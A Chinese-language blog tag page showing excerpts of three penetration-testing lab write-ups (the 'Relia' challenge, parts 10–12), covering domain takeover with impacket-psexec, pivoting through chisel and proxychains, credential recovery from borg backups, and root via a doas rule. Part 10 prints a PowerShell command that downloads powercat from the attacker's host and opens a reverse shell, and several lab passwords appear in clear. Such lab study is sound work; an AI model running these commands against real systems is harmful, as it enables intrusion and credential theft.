發表文章

目前顯示的是有「Relia」標籤的文章

Challenge 2 - Relia(12)

圖片
 Challenge 2 - Relia(12) 終於來到 Relia 公司的最後一台機器,位於內網的 .20 Linux 主機 使用上一章在 brog Job 中登入到 .20 備份作業使用的帳號密碼  andrew:Rb9kNokjDsjYyH 測試登入 .20 看看,直接進去了且拿到 local.txt cat /etc/passwd 看來是台 FreeBSD,好難用啊 sudo -l 的指令既然沒有,真是太糟糕了 查看 SUID,find / -perm -u=s -type f 2>/dev/null,發現 doas 甚麼是 doas,參考 :  https://zh.wikipedia.org/zh-tw/Doas doas (「do as」)是一個用來以其他使用者身分執行指令的程式。 系統管理員可以對其進行設定,賦予指定使用者執行特定指令的權限。 doas 是由 Ted Unangst 為 OpenBSD 所開發的,是一種更簡單且更安全的 sudo 替代品 範例 : 允許 user1 在不輸入密碼的情況下以 root 的身分執行 procmap: permit nopass user1 as root cmd /usr/sbin/procmap 允許 wheel 群組的成員以 root 身分執行任何指令: permit :wheel as root 上方設定的簡化版本(但僅在安裝後,預設的使用者為 root 的情況下才有效): permit :wheel 允許 wheel 群組的成員執行任何指令(預設使用者為 root 的情況下) 並記住他們輸入的密碼: permit persist :wheel 了解 doas 後,就來找看看有無相關的 doas 設定值 找看看 *doas* 的檔案,find / -type f -name *doas* 2>/dev/null 看到 /usr/local/etc/doas.conf 果然有寫 permit nopass andrew as root cmd service args apache24 onestart 現有使用者 andrew 可以不用密碼執行 apache24 服務 啟動看看 doas service apache24 onestart ...

Challenge 2 - Relia(11)

圖片
 Challenge 2 - Relia(11) 剩下兩台內網的 Linux Server .19 & .20,下一個目標先從 .19 下手 從 .191 Windows 內建的 SSH 到 .19 發現無法登入,告知要使用 Key 的方式登入 測試上一章拿到的 id_ed25519 連線到 .19 直接進去了,並且拿到 local.txt flag cat /etc/passwd,發現另外一個使用者 amy cat /etc/crontab 執行 pspy64 發現會定期跑 /root/createbackup.sh 且有一組密碼 "xinyVzoH2AnJpRK9sfMgBA" sudo -l  User sarah may run the following commands on backup:     (ALL) NOPASSWD: /usr/bin/borg list *     (ALL) NOPASSWD: /usr/bin/borg extract *     (ALL) NOPASSWD: /usr/bin/borg mount * borg 是一個 linux 專門用來備份軟件的套件,使用說明如下連結 https://borgbackup.readthedocs.io/en/1.1.15/quickstart.html 依據 pspy64 的內容 /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1715849674 /media/usb0 可以看到 create 的內容是 /opt/borgbackup::usb_1715849674 /media/usb0 執行 sudo /usr/bin/borg extract /opt/borgbackup::home --stdout 並輸入在 pspy64 獲得的密碼 發現 amy 用來登入 20 的帳號密碼是 andrew:Rb9kNokjDsjYyH 以及 amy 自己本身的密碼,看來是一組 HASH hashes.com 解出來是 backups1 使用 su amy ...

Challenge 2 - Relia(10)

圖片
Challenge 2 - Relia(10) 上一章節已經拿到 Relia.com 網域的 Domain Admin,所以接下來就是將網域相關的 Windows 機器一台一台拿下,下一台先將外網的最後一台 .189 拿下,攻擊順序表如下 直接使用 impacket-psexec 進去也可以,但是總覺得 CLI 介面輸出太慢,所以一樣使用 impacket-psexec 但是直接建立一個 Reverse Shell 回來的指令 impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@192.168.157.189 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.202/tools/powercat.ps1');powercat -c 192.168.45.202 -p 4444 -e powershell" whoami,主機名稱,IP 資訊與 flag 輸出如下,這一台僅有 proof.txt 且是雙網卡 更新攻擊列表完成 .189,下一台選定內網的 .11 透過 impacket-psexec 先進 191,然後搭建 chisel,之後直接透過 proxychains 使用 impacket-psexec 進去 .30 └─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.30 這一台僅有 proof.txt 後續枚舉僅發現 administrator HASH 有用的資訊而已,其他沒有發現 更新攻擊列表,選定下一台為 relai.com 網域的 DC 直接透過 proxychains 使用 impacket-psexec 建立一個 Reverse shell 回來,└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.6 "powershell -...